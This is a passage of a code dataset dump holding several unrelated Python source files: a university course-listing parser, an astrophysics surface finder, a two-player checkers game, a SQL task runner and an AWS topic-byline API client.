BeautifulSoup(html_doc)\n\t\t\tstripped=soup.get_text().encode(\"ascii\",'ignore')#changing encoding may be needed on other platforms.\n\t\t\tfo = open(self.output_file_name, \"wb\")\n\t\t\tfo.write(stripped)\n\t\t\t# Close opened file\n\t\t\tfo.close()\n\n\t\tself.stripped_file=open(output_file_name, 'r')\n\n\tdef pop_course(self):#Reads one course from file\n\t\t#returns None if course isn't scheduled for this year\n\t\t#Otherwise gives course\n\n\t\tline=self.read_line()\n\n\t\t#Occasionally instead of a course's information a line will have a new\n\t\t#department, if this is the case set the department to the current line\n\t\t#and then read in another line which should be a course code\n\t\tif self.is_dept(line):\n\t\t\tself.current_dept=line\n\t\t\tline=self.read_line()\n\n\t\tcourse_code=line\n\n\t\t#There are really wierd edge cases were this line isn't a course code\n\t\t#This reads until a course code, solving those errors\n\t\twhile not self.is_course_code(course_code):\n\t\t\tcourse_code=self.read_line()\n\t\tassert self.is_course_code(course_code)\n\n\t\tcourse_name=self.read_line()\n\n\t\tline=self.read_line()\n\t\tif line in \"NOT OFFERED\":#This exact string is used to indicate not offered courses\n\t\t\treturn None\n\t\tcourse_term=int(line[-1])#Get the last character of the line, \"T1\" -> 1\n\n\t\tcourse_section=self.read_line()#DAY or NIGHT are the exact strings\n\t\tassert self.is_section(course_section)\n\n\t\t#All of the course's information has been loaded so the course is created\n\t\tnew_course=Course(self.current_dept,course_code,course_name,course_term,course_section)\n\n\t\t#If information about what site the course is for is given, it is skipped over\n\t\tif \"SITE STUDENTS\" in self.peek_line():\n\t\t\tself.read_line()\n\n\t\t#If the course is cancelled read ahead until the next line is a course or a department\n\t\tif \"CANCELLED\" in self.peek_line():\n\t\t\tself.read_until([self.is_course_code,self.is_dept])\n\t\t\treturn None\n\n\t\t#Read in all of the courses segments\n\t\twhile (self.is_class_type(self.peek_line()) or self.is_ignorable(self.peek_line())):\n\t\t\tnew_course_segment=self.read_course_segment()\n\t\t\tif new_course_segment:\n\t\t\t\tnew_course.add(new_course_segment)\n\t\t\tif self.is_ignorable(self.peek_line()):\n\t\t\t\tself.read_line()\n\t\t#new_course.consolidate_segments()\n\t\treturn new_course\n\n\n\tdef read_course_segment(self):\n\t\t#Reads one course segment\n\t\t#Ensures the course is running\n\t\t#Gets the note if any\n\t\tnew_segment=CourseSegment()\n\t\tline=self.read_line()\n\n\n\t\tif \"EOW\" in line:\n\t\t\tnew_segment.eow=True\n\t\t\tline=self.read_line()\n\n\t\t#If the course segment is cancelled, read until the next line is the\n\t\t#start of a new segment or a new course or a new department\n\t\tif \"CANCELLED\" in line:\n\t\t\tread_until([self.is_course_code,self.is_class_type,self.is_dept])\n\n\t\tassert self.is_class_type(line)\n\t\tnew_segment.name=line\n\n\t\t#If there aren't details about the segment, it won't be loaded\n\t\t#Read until the next segment or course is read.\n\t\tif \"TBA\" in self.peek_line() or \"CANCELLED\" in self.peek_line():\n\t\t\tself.read_until([self.is_course_code,self.is_class_type,self.is_dept])\n\t\t\treturn None\n\n\t\twhile self.is_days(self.peek_line()):\n\t\t\tline=self.read_line()\n\t\t\tassert self.is_days(line)\n\t\t\tdays=line.split()\n\n\t\t\tstart_hour,start_min=self.read_time()\n\t\t\tend_hour,end_min=self.read_time()\n\t\t\tterm=int(self.read_line())\n\n\t\t\tfor day in days:\n\t\t\t\tblock=TimeBlock(TimeBlock.day_to_num[day],start_hour,start_min,end_hour,end_min,term)\n\t\t\t\tnew_segment.add(block)\n\n\t\t\tline=self.peek_line()\n\t\t\tif self.is_room(line):\n\t\t\t\tnew_segment.room=self.read_line()\n\t\t\t\tline=self.peek_line()\n\t\t\tif self.is_prof(line):\n\t\t\t\tnew_segment.prof=self.read_line()\n\t\t\t\tline=self.peek_line()\n\t\t\tif self.is_note(line):\n\t\t\t\tnew_segment.note=self.read_line()\n\t\treturn new_segment\n\n\tdef read_until(self,functions):\n\t\tstill_reading = True\n\t\tfor check in functions:\n\t\t\tif check(self.peek_line()):\n\t\t\t\tstill_reading = False\n\t\twhile still_reading:\n\t\t\tself.read_line()\n\t\t\tfor check in functions:\n\t\t\t\tif check(self.peek_line()):\n\t\t\t\t\tstill_reading = False\n\n\tdef read_time(self):\n\t\tline=self.read_line()\n\t\tassert self.is_time(line)\n\t\thour,min=line.split(\":\")\n\t\thour=int(hour)\n\t\tmin=int(min)\n\t\treturn hour,min\n\n\tdef is_ignorable(self,line):\n\t\tignorable_words = [\"EOW\",\"CANCELLED\",\"SITE\"]\n\t\tfor word in ignorable_words:\n\t\t\tif word in line:\n\t\t\t\treturn True\n\n\t\treturn False\n\n\tdef is_note(self,text):\n\t\t#list other methods\n\t\t#iterate and try them all\n\t\t#woo hoo go python\n\t\tother_checks=[\n\t\t\tself.is_course_code,\n\t\t\tself.is_class_type,\n\t\t\tself.is_section,\n\t\t\tself.is_days,\n\t\t\tself.is_dept,]\n\t\tfor check in other_checks:\n\t\t\tif check(text):\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef is_course_code(self,text):\n\t\tif len(text)!=4:\n\t\t\treturn False\n\t\treturn (not text[0].isalpha())and(text[1].isalpha())and(not text[3].isalpha())\n\n\tdef is_class_type(self,text):\n\t\tif not len(text)==3:\n\t\t\treturn False\n\t\treturn ((text[0].isalpha())and(not text[1].isalpha())and(not text[2].isalpha()))\n\n\tdef is_room(self,text):\n\t\tif \"MHK/CAMPUS\" in text or \"CON/CAMPUS\" in text:\n\t\t\treturn True\n\t\treturn (\"/\" in text) and len(text)<10\n\n\tdef is_prof(self,text):\n\n\t\treturn (\",\" in text) and (text.count(\" \")<=5)\n\n\tdef is_time(self,text):\n\t\tif len(text)!=5 or not(\":\" in text[2]):\n\t\t\treturn False\n\t\treturn text.replace(\":\",\"\").isnumeric()\n\n\tdef is_section(self,text):\n\n\t\treturn text == \"DAY\" or text == \"EVE\"\n\n\tdef is_days(self,text):\n\t\twords=text.split()\n\t\tfor word in words:\n\t\t\tif not word in TimeBlock.day_to_num:\n\t\t\t\treturn False\n\t\treturn True\n\n\tdef is_dept(self,text):\n\n\t\treturn \"(\" in text and \")\" in text\n\n\tdef peek_line(self):#Reads the the next line in the file but stores it as peekedline\n\t\tself.peeked_line=self.read_line()\n\t\treturn self.peeked_line\n\n\tdef read_line(self):#returns the next non blank line in the file, unless a line was peeked, then it returns the peeked line.\n\t\tif self.peeked_line:\n\t\t\tline=self.peeked_line\n\t\t\tself.peeked_line=False\n\t\telse:\n\t\t\tline=self.stripped_file.readline()\n\t\t\tself.line_no += 1\n\t\t\tif line == \"\":\n\t\t\t\t#An empty string indicates EOF\n\t\t\t\traise EOFError()\n\t\t\tline=str(line).strip()#Strip whitespace from the read line\n\n\t\t\twhile line == \"\":\n\t\t\t\t#If the line was just whitespace\n\t\t\t\tself.line_no+=1\n\t\t\t\tline=self.stripped_file.readline()\n\t\t\t\tif line == \"\":#An empty string indicates EOF\n\t\t\t\t\traise EOFError()\n\n\t\t\t\tline=str(line).strip()#Strip whitespace and newlines\n\t\treturn line\n","sub_path":"server/MacCourseLoader.py","file_name":"MacCourseLoader.py","file_ext":"py","file_size_in_byte":7386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"138613546","text":"'''\nFind a surface fulfilling a certain criterion in a snapshot\nSam Geen, June 2018\n'''\n\nfrom startup import *\n\nfrom pymses.filters import CellsToPoints\nfrom pymses.utils import constants as C\nfrom pymses.analysis import sample_points\nfrom scipy.spatial import ConvexHull\n\ndef findsurface(snap,criterion=\"wind\"):\n # Functions to determine which cells are in the surface\n def findwind(dset):\n temp = dset[\"P\"]/dset[\"rho\"]*snap.info[\"unit_temperature\"].express(C.K) \n return temp > 1e5\n def findHII(dset):\n return dset[\"xHII\"] > 0.1\n # Get the cells\n amr = snap.amr_source([\"rho\",\"P\",\"xHII\",\"vel\"])\n cell_source = CellsToPoints(amr)\n cells = cell_source.flatten()\n mask = []\n if criterion == \"wind\":\n mask = findwind(cells)\n # Check if there are actually cells\n if len(mask) == 0:\n return None\n # Find surface\n points = cells.points\n return cells\n hull = ConvexHull(points[mask,:])\n # This is a list of indices of points on the surface\n surface = points[hull.vertices,:]\n # Can't be bothered to reverse mask to find the original list, so do this the longish way\n surfcells = sample_points(amr, surface)\n return surfcells\n\n\nif __name__==\"__main__\":\n sim = hamusims[\"IMF2_04\"]\n snap = sim.Snapshots()[39] # Get a random output with an evolved bubble\n surf = findsurface(snap.RawData(),\"wind\")\n import pdb; pdb.set_trace()\n","sub_path":"AMUN/scripts/surfacefinder.py","file_name":"surfacefinder.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"331574432","text":"###\n#\n# Two-player checkers\n# Jacob Maibach, 2017\n#\n###\n\n#\n# To do list / reminders\n#\n# 1. debug (exception - InvalidMove in BoardState.remove_piece)\n# 4. implement interface for AI (no need to use coroutines - just use objects)\n# 5. implement user interface / implement graphics\n#\n# Issues\n#\n# 1. saving board entries as strings is inoptimal (see BoardState.get_pieces)\n#\n\nfrom abc import ABC,abstractmethod # abstract base classes\nfrom random import randint\n\n### exceptions\n\nclass InvalidMove(Exception):\n pass\n\n### board\n\nclass BoardState:\n piece_colors = [' ','R','RK','BK','B'] # use +1,-1 for R,B and +2,-2 for RK,BK\n empty = 0\n orientation = {'R':+1,'B':-1}\n \n def __init__(self,size,state = 'standard'):\n if(state == 'standard'):\n self.state = BoardState.standard_state(size)\n else:\n self.state = state\n self.size = size\n self.color_lookup = {BoardState.piece_colors[i]:i for i in range(len(BoardState.piece_colors))}\n \n def set_entry(self,i,j,val):\n self.state[i][j] = BoardState.piece_colors[val]\n \n def get_entry(self,i,j):\n color = self.state[i][j]\n index = self.color_lookup[color]\n return index\n\n def standard_state(size):\n '''\n Generates a standard starting board state.\n '''\n state = [[0 for j in range(size)] for i in range(size)]\n back = size//2\n front = back - 1 \n for i in range(size):\n for j in range(size): # this encoding strategy is bad\n if((i + j) % 2 == 0):\n state[i][j] = BoardState.piece_colors[0] # empty\n elif(i < front):\n state[i][j] = BoardState.piece_colors[+1] # red\n elif(i > back):\n state[i][j] = BoardState.piece_colors[-1] # black\n else:\n state[i][j] = BoardState.piece_colors[0] # empty\n return state\n\n def does_location_exist(self,loc):\n '''\n Checks if the location is on the board.\n Returns a boolean.\n '''\n if(loc[0] < 0 or loc[0] >= self.size):\n return False\n elif(loc[1] < 0 or loc[1] >= self.size):\n return False\n else:\n return(isinstance(loc[0],int) and isinstance(loc[1],int))\n \n def is_location_empty(self,loc):\n '''\n Checks if the location is not occupied by a piece.\n Returns a boolean.\n '''\n return self.get_entry(*loc) == self.empty\n\n def move(self,start_loc,end_loc):\n '''\n Moves piece at one location to another.\n Does not validate move.\n '''\n piece = self.get_entry(*start_loc)\n self.remove_piece(start_loc)\n self.set_entry(end_loc[0],end_loc[1],piece)\n\n def remove_piece(self,loc):\n '''\n Removes the piece at the given location,\n checking that the location is not empty.\n '''\n if(self.is_location_empty(loc)):\n raise InvalidMove('no piece at that location')\n else:\n self.set_entry(loc[0],loc[1],self.empty)\n\n def get_pieces(self):\n '''\n Returns the sequence of pieces on the board,\n ordered left to right and down.\n '''\n col = [self.piece_colors[1],self.piece_colors[-1]]\n convert = [None,(col[0],False),(col[0],True),(col[1],False),(col[1],True)]\n \n out = []\n for i in range(self.size):\n for j in range(self.size):\n entry = self.get_entry(i,j)\n if(entry != self.empty):\n loc = (i,j)\n (color,promoted) = convert[entry]\n piece = Piece(loc,color,promoted)\n out.append(piece)\n return out\n \n \nclass Board(BoardState):\n## def __init__(self,size,initial = 'auto'):\n## if(size % 2 == 1):\n## raise ValueError('size must be even')\n## if(initial == 'auto'):\n## self.state = BoardState(size)\n## else:\n## raise NotImplementedError('non-standard initial states not implemented')\n\n def view(self,fast = True):\n if(fast):\n for x in self.state:\n print(x)\n else:\n raise NotImplementedError\n\n def update_state(self,piece,move):\n '''\n Changes the board state to move the piece as directed.\n Does not check validity of the move.\n '''\n \n start_loc = piece.loc\n end_loc = move.get_end_location(start_loc)\n self.move(start_loc,end_loc)\n piece.loc = end_loc\n\n def has_jump(self,piece):\n '''\n Checks if the piece has a jump move open.\n Used to check for multiple-move turns.\n '''\n valid_moves = self.get_valid_moves(piece)\n return any(m.jump for m in valid_moves)\n\n def is_valid(self,piece,move):\n '''\n Checks if the given move is valid (if end location exists and is empty).\n Returns a boolean.\n '''\n start_loc = piece.location\n end_loc = move.get_end_location(start_loc)\n return self.does_location_exist(end_loc) and self.is_location_empty(end_loc)\n\n def get_valid_moves(self,piece):\n '''\n Returns the list of valid moves for the given piece.\n '''\n if(piece.promoted):\n directions = [(+1,+1),(-1,-1),(-1,+1),(+1,-1)]\n else:\n forward = self.orientation[piece.color]\n directions = [(+1,forward),(-1,forward)]\n out = []\n for direction in directions:\n regular_move = Move(direction,jump = False)\n jump_move = Move(direction,jump = True)\n \n if(self.is_valid(piece,regular_move)):\n out.append(regular_move)\n elif(self.is_valid(piece,jump_move)):\n out.append(jump_move)\n \n # inefficient: should check out-of-bounds separately from jump\n return out\n\n def count_pieces(self,include_promotion = False):\n '''\n Counts the number of each type of piece.\n '''\n count = [0,0,0,0,0]\n for i in range(self.size):\n for j in range(self.size):\n entry = self.get_entry(i,j)\n count[entry] += 1\n if(include_promotion):\n out = {self.piece_colors[i]:count[i] for i in range(1,len(self.piece_colors))}\n return out\n else:\n temp = {self.piece_colors[i]:count[i] for i in range(1,len(self.piece_colors))}\n R = [self.piece_colors[1],self.piece_colors[2]]\n B = [self.piece_colors[-1],self.piece_colors[-2]]\n return {self.piece_colors[1]:sum(temp[i] for i in R), self.piece_colors[-1]:sum(temp[i] for i in B)}\n\n### sub-board objects\n\nclass Move:\n def __init__(self,direction,jump = False):\n '''\n Direction may be one of the following: (+1,+1),(-1,-1),(-1,+1),(+1,-1)\n The first component indicates left-right (-1/+1) direction and the second forward-backward (+1/-1).\n '''\n self.right = direction[0] # +- 1\n self.forward = direction[1]\n self.jump = jump\n self._string_ = 'Move(direction = {0},jump = {1})'.format((self.right,self.forward),self.jump)\n\n def __str__(self):\n return self._string_\n\n def get_end_location(self,start_loc):\n '''\n Given a starting location for the move, determines where it should end (may be invalid).\n '''\n loc = start_loc[:]\n if(self.jump):\n scale = 2\n else:\n scale = 1\n loc[0] += scale*self.right\n loc[1] += scale*self.forward\n return loc\n\n @property\n def direction(self):\n return (self.forward,self.right)\n\n\nclass Piece:\n def __init__(self,location,color,is_promoted = False):\n self.loc = list(location)\n self.color = color\n self.promoted = is_promoted\n\n @property\n def location(self):\n return self.loc\n\n\n### user interfaces\n\nclass Player(ABC):\n @abstractmethod\n def prompt(self,board,piece = None):\n '''\n Prompts the player to make a move.\n If the input piece is given, the player will be restricted to moving that piece (useful for jumps). \n '''\n pass\n\n @abstractmethod\n def end(self,victory):\n '''\n Informs the player of their victory, or lack thereof.\n Used either to control graphic interface or to reward AI.\n '''\n pass\n\nclass HumanPlayer(Player):\n def __init__(self,name = None):\n self.name = name\n \n def prompt(self,board,color,piece = None):\n raise NotImplementedError\n\n def end(self,victory):\n raise NotImplementedError\n\nclass AI_Player(Player):\n def __init__(self,color,AI,name = None):\n self.name = name\n self.color = color\n self.AI = AI\n \n def prompt(self,board,color,piece = None):\n raise NotImplementedError\n\n def end(self,victory):\n raise NotImplementedError\n\nclass RandomPlayer(Player):\n def __init__(self,name = None):\n self.name = name\n\n def prompt(self,board,color,piece = None):\n if(piece is not None):\n possible_moves = board.get_valid_moves(piece)\n choice = randint(0,len(possible_moves) - 1)\n move = possible_moves[choice]\n else:\n number_possible_moves = 0\n while(number_possible_moves == 0):\n possible_pieces = [p for p in board.get_pieces() if p.color == color]\n assert(len(possible_pieces) != 0)\n choice = randint(0,len(possible_pieces)-1)\n piece = possible_pieces[choice]\n possible_moves = board.get_valid_moves(piece)\n number_possible_moves = len(possible_moves)\n choice = randint(0,number_possible_moves - 1)\n move = possible_moves[choice]\n return(piece,move)\n\n def end(self,victory):\n pass\n\nclass AdminPlayer(Player):\n def __init__(self,name = None):\n self.name = name\n \n def prompt(self,board,color,piece = None):\n move = None\n board.view(fast = True)\n if(piece is not None):\n valid_moves = board.get_valid_moves(piece)\n if(piece is None):\n valid_pieces = [p for p in board.get_pieces() if p.color == color]\n print(\"Pieces:\")\n for i,p in enumerate(valid_pieces):\n print(\"{k}:{loc}\".format(k = i+1, loc = p.location))\n while(piece is None):\n try:\n choice = int(input(\"Choose a piece to move: \"))\n except ValueError:\n print(\"Enter the number of the piece.\")\n if(1 <= choice <= len(valid_pieces)):\n piece = valid_pieces[choice - 1]\n valid_moves = board.get_valid_moves(piece)\n if(len(valid_moves) == 0):\n piece = None\n print(\"No valid moves for this piece.\")\n else:\n print(\"Invalid piece number.\")\n while(move is None):\n print(\"Moves:\")\n for i,m in enumerate(valid_moves):\n print(\"{k}:{direc}\".format(k = i+1, direc = m.direction))\n while(True):\n try:\n choice = int(input(\"Choose a move: \"))\n except ValueError:\n print(\"Enter the number of the piece.\")\n if(1 <= choice <= len(valid_moves)):\n move = valid_moves[choice-1]\n break\n else:\n print(\"Invalid move number.\")\n return(piece,move)\n\n def end(self,victory):\n print(\"Game ended.\")\n\n### main\n\nclass Game:\n '''\n Implements the game system:\n 1. turn management\n 2. board and move management\n 3. interaction between player interfaces and backend\n '''\n def __init__(self,player_1,player_2,size = 8,turn_order = ('B','R')):\n self.players = [player_1,player_2]\n self.board_size = size\n self.board = Board(size)\n self.turn_count = 0\n self.turn_order = turn_order\n\n def next_turn(self):\n color = self.turn_order[self.turn_count % 2]\n player = self.players[self.turn_count % 2]\n moving = True\n piece = None\n while(moving):\n piece,move = player.prompt(self.board,color,piece = piece)\n if(move == 'Draw'):\n self.end(victory = False)\n break\n self.board.update_state(piece,move)\n moving = self.board.has_jump(piece)\n self.turn_count += 1\n\n def run(self):\n board_counts = {self.board.piece_colors[1]:1,self.board.piece_colors[-1]:1} # inaccurate\n while(0 not in board_counts.values()):\n self.next_turn()\n board_counts = self.board.count_pieces(include_promotion = False)\n self.end(victory = True)\n\n def end(self,victory):\n '''\n Initiates the end step of the game.\n '''\n if(victory):\n victor = self.turn_count % 2\n self.players[victor].end(victory = True)\n self.players[not victor].end(victory = False)\n else:\n self.players[0].end(victory = None)\n self.players[1].end(victory = None)\n\n### output types\n\n##class StateVector:\n## king_value = 2\n## pass\n\ndef get_output_statelist(boardstate):\n '''\n Represents entries as characters and not numbers.\n '''\n # -K, -1, 0, +1, +K\n out = []\n for row in boardstate.state:\n out.extend(row)\n return out\n\nclass GameSeq:\n '''\n Records the sequence of moves of a game in a compact format.\n '''\n def __init__(self,seq = None,compressed = False):\n if(seq is None):\n self.seq = []\n else:\n self.seq = seq\n self.compressed = compressed\n\n def add_next(self,piece,move,boardstate):\n '''\n Adds the details of the next move to the GameSeq object.\n '''\n if(not self.compressed):\n new = piece.loc + (move.right,move.forward,int(move.jump))\n elif(self.compressed == \"index\"):\n for i,p in enumerate(boardstate.get_pieces()):\n if(p == piece):\n index = i\n break\n new = (index,move.right,move.forward,int(move.jump))\n else:\n raise NotImplementedError\n self.seq.append(new)\n \nif __name__ == '__main__':\n p1 = AdminPlayer()\n p2 = RandomPlayer()\n g = Game(p1,p2)\n g.run()\n","sub_path":"checkers_game.py","file_name":"checkers_game.py","file_ext":"py","file_size_in_byte":14722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"349803821","text":"lista=list()\r\nfhand=open('romeo.txt')\r\nfor line in fhand:\r\n line=line.rstrip()\r\n wordlista=line.split()\r\n for word in wordlista:\r\n if word in lista:\r\n continue\r\n else:\r\n lista=lista.append(word)\r\n \r\n","sub_path":"test may 7.py","file_name":"test may 7.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"408678823","text":"from sqlalchemy import or_, select\n\nfrom ..core.errors import Err, Exc, Ok\nfrom . import Task\n\n\nclass BaseSqlTask(Task):\n target_table_exists = None\n _target_db = None\n\n @property\n def target_db(self):\n return self.connections[self._target_db]\n\n def run(self):\n return self.execute_steps()\n\n def compile(self):\n return self.execute_steps()\n\n def execute_steps(self):\n # For incremental loads, manipulate the \"Merge\" steps depending on whether\n # the target table exists or not. This is done so we can delay the introspection\n if \"Merge\" in self.steps:\n self.target_table_exists = self.target_db._table_exists(\n self.table, self.schema\n )\n\n if not self.target_table_exists:\n tmp = self.steps[self.steps.index(\"Merge\") + 1 :]\n self.steps = self.steps[: self.steps.index(\"Merge\")]\n\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if len(self.ddl[\"indexes\"]) > 0 or (\n len(self.ddl[\"primary_key\"]) > 0\n and len(self.ddl[\"columns\"]) > 0\n and len(cols_no_type) > 0\n ):\n self.steps.append(\"Create Indexes\")\n self.steps.extend([\"Cleanup Target\", \"Move\"])\n\n self.steps.extend(tmp)\n else:\n self.steps.append(\"Cleanup\")\n\n self.set_run_steps(self.steps)\n\n for step in self.steps:\n with self.step(step):\n result = self.execute_step(step)\n if result.is_err:\n return result\n\n return Ok()\n\n def execute_step(self, step):\n execute = self.run_arguments[\"command\"] == \"run\"\n\n get_query_steps = {\n \"Create Temp\": lambda: self.create_select(\n self.tmp_table, self.tmp_schema, self.sql_query, self.ddl\n ),\n \"Create Temp DDL\": lambda: self.target_db._create_table_ddl(\n self.tmp_table, self.tmp_schema, self.ddl\n ),\n \"Create View\": lambda: self.target_db._create_table_select(\n self.table, self.schema, self.sql_query, view=True\n ),\n \"Create Indexes\": lambda: self.create_indexes(\n self.tmp_table, self.tmp_schema, self.ddl\n ),\n \"Merge\": lambda: self.target_db._merge_tables(\n self.tmp_table,\n self.tmp_schema,\n self.table,\n self.schema,\n self.delete_key,\n ),\n \"Move\": lambda: self.target_db._move_table(\n self.tmp_table, self.tmp_schema, self.table, self.schema, self.ddl,\n ),\n \"Grant Permissions\": lambda: self.target_db.grant_permissions(\n self.table, self.schema, self.ddl[\"permissions\"]\n ),\n }\n\n if step in get_query_steps:\n # These steps are always: 1. Get the query, 2. Save to disk, 3. Execute\n # For more complex steps, there are specific entries in this if construct\n query = get_query_steps[step]()\n if self.run_arguments[\"debug\"]:\n self.write_compilation_output(query, step.replace(\" \", \"_\").lower())\n if execute:\n try:\n self.target_db.execute(query)\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n elif step == \"Write Query\":\n return self.write_compilation_output(self.sql_query, \"select\")\n\n elif step == \"Execute Query\":\n if execute:\n try:\n self.target_db.execute(self.sql_query)\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n elif step == \"Cleanup\":\n result = self.cleanup(self.tmp_table, self.tmp_schema, step, execute)\n if result.is_err:\n return result\n\n return Ok()\n\n elif step == \"Cleanup Target\":\n result = self.cleanup(self.table, self.schema, step, execute)\n if result.is_err:\n return result\n\n return Ok()\n\n elif step == \"Load Data\":\n try:\n self.load_data(\n self.source_table_def,\n self.source_db,\n self.table,\n self.schema,\n self.tmp_table,\n self.tmp_schema,\n self.incremental_key,\n self.ddl,\n execute,\n )\n except Exception as e:\n return Exc(e)\n\n return Ok()\n\n else:\n return Err(\"task_execution\", \"unknown_step\", step=step)\n\n # SQL execution steps methods\n\n def create_select(self, table, schema, select, ddl):\n out_sql = list()\n\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if len(ddl.get(\"columns\")) == 0 or len(cols_no_type) > 0:\n out_sql.append(\n self.target_db._create_table_select(\n table, schema, select, view=False, ddl=self.ddl\n )\n )\n else:\n # create table with DDL and insert the output of the select\n out_sql.append(self.target_db._create_table_ddl(table, schema, ddl))\n\n ddl_column_names = [c[\"name\"] for c in ddl.get(\"columns\")]\n out_sql.append(\n self.target_db._insert(table, schema, select, columns=ddl_column_names)\n )\n\n return \"\\n\".join(out_sql)\n\n def create_indexes(self, tmp_table, tmp_schema, ddl):\n cols_no_type = [c for c in self.ddl[\"columns\"] if c[\"type\"] is None]\n if not (len(ddl.get(\"columns\")) == 0 or len(cols_no_type) > 0):\n # Based on create_select: this condition means we're issuing a\n # create_table_ddl, in which case we don't need an alter to\n # add the primary key\n ddl = {k: v if k != \"primary_key\" else dict() for k, v in ddl.items()}\n\n return self.target_db._create_indexes(tmp_table, tmp_schema, ddl)\n\n def cleanup(self, table, schema, step, execute):\n out_sql = list()\n\n # using those flags to capture error here. Not sure how to best capture a genuine error fail (e.g. permissions). To investigate.\n cleanup_table_failed = False\n cleanup_view_failed = False\n\n try:\n out_sql.append(\n self.target_db._drop_table(table, schema, view=False, execute=execute)\n )\n except:\n cleanup_table_failed = True\n\n try:\n out_sql.append(\n self.target_db._drop_table(table, schema, view=True, execute=execute)\n )\n except:\n cleanup_view_failed = True\n\n query = \"\\n\".join(out_sql)\n if self.run_arguments[\"debug\"]:\n self.write_compilation_output(query, step.replace(\" \", \"_\").lower())\n\n if cleanup_table_failed and cleanup_view_failed:\n return Err(\"task_step\", step, table=table, schema=schema)\n else:\n return Ok()\n\n def load_data(\n self,\n source_table_def,\n source_db,\n table,\n schema,\n tmp_table,\n tmp_schema,\n incremental_key,\n ddl,\n execute,\n ):\n # Get the incremental value\n\n last_incremental_value_query = (\n f\"SELECT MAX({incremental_key}) AS value\\n\"\n f\"FROM {'' if schema is None else schema +'.'}{table}\\n\"\n f\"WHERE {incremental_key} IS NOT NULL\"\n )\n if self.run_arguments[\"debug\"]:\n self.write_compilation_output(\n last_incremental_value_query, \"last_incremental_value\"\n )\n\n get_data_query = select([source_table_def.c[c[\"name\"]] for c in ddl[\"columns\"]])\n last_incremental_value = None\n\n if not self.is_full_load and self.target_table_exists:\n if execute:\n res = self.target_db.read_data(last_incremental_value_query)\n if len(res) == 1:\n last_incremental_value = res[0][\"value\"]\n else:\n last_incremental_value = \"LAST_INCREMENTAL_VALUE\"\n\n # Select stream\n if last_incremental_value is not None:\n get_data_query = get_data_query.where(\n or_(\n source_table_def.c[incremental_key].is_(None),\n source_table_def.c[incremental_key] > last_incremental_value,\n )\n )\n if self.run_arguments[\"debug\"]:\n self.write_compilation_output(get_data_query, \"get_data\")\n\n if execute:\n data_iter = source_db._read_data_stream(get_data_query)\n return self.target_db.load_data(tmp_table, data_iter, schema=tmp_schema)\n else:\n return Ok()\n","sub_path":"sayn/tasks/base_sql.py","file_name":"base_sql.py","file_ext":"py","file_size_in_byte":9024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"303993122","text":"\"\"\"\nCreated on 1 Aug 2023\n\n@author: Bruno Beloff (bruno.beloff@southcoastscience.com)\n\nEquivalent to cURLs:\ncurl \"https://aws.southcoastscience.com/device-topics?topic=south-coast-science-dev/alphasense/loc/303/gases\"\ncurl \"https://aws.southcoastscience.com/device-topics?device=scs-bgx-303\"\n\"\"\"\n\nimport requests\n\nfrom collections import OrderedDict\nfrom urllib.parse import parse_qs, urlparse\n\nfrom scs_core.aws.client.api_client import APIClient, APIResponse\nfrom scs_core.aws.data.byline import Byline, DeviceBylineGroup, TopicBylineGroup\n\nfrom scs_core.data.str import Str\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass BylineFinder(APIClient):\n \"\"\"\n classdocs\n \"\"\"\n\n __URL = 'https://k5uz49605m.execute-api.us-west-2.amazonaws.com/default/TopicBylines'\n\n __DEVICE = 'device'\n __TOPIC = 'topic'\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self, reporter=None):\n super().__init__(reporter=reporter)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def find_latest_byline_for_topic(self, token, topic):\n params = {self.__TOPIC: topic}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n jdict = response.json()\n\n # bylines...\n if jdict is None:\n return None\n\n latest_byline = None\n\n for item in jdict:\n byline = Byline.construct_from_jdict(item)\n\n if latest_byline is None or latest_byline.rec < byline.rec:\n latest_byline = byline\n\n return latest_byline\n\n\n def find_bylines(self, token, excluded=None, strict_tags=False):\n bylines = [item for item in self._get_blocks(self.__URL, token, BylineFinderResponse)]\n\n return TopicBylineGroup.construct(bylines, excluded=excluded, strict_tags=strict_tags)\n\n\n def find_bylines_for_topic(self, token, topic, excluded=None, strict_tags=False):\n params = {self.__TOPIC: topic}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n return TopicBylineGroup.construct_from_jdict(jdict, excluded=excluded, strict_tags=strict_tags, skeleton=True)\n\n\n def find_bylines_for_device(self, token, device, excluded=None):\n params = {self.__DEVICE: device}\n\n response = requests.get(self.__URL, headers=self._token_headers(token), params=params)\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n return DeviceBylineGroup.construct_from_jdict(jdict, excluded=excluded, skeleton=True)\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass DeviceBylineFinder(APIClient):\n \"\"\"\n classdocs\n \"\"\"\n\n __URL = 'https://k5uz49605m.execute-api.us-west-2.amazonaws.com/default/TopicBylines/self'\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def __init__(self):\n super().__init__()\n\n\n # ----------------------------------------------------------------------------------------------------------------\n\n def find_byline_for_topic(self, token, topic):\n response = requests.get(self.__URL, headers=self._token_headers(token))\n self._check_response(response)\n\n jdict = response.json()\n\n # bylines...\n if jdict is None:\n return None\n\n for item in jdict:\n byline = Byline.construct_from_jdict(item)\n\n if byline.topic == topic:\n return byline\n\n return None\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nclass BylineFinderResponse(APIResponse):\n \"\"\"\n classdocs\n 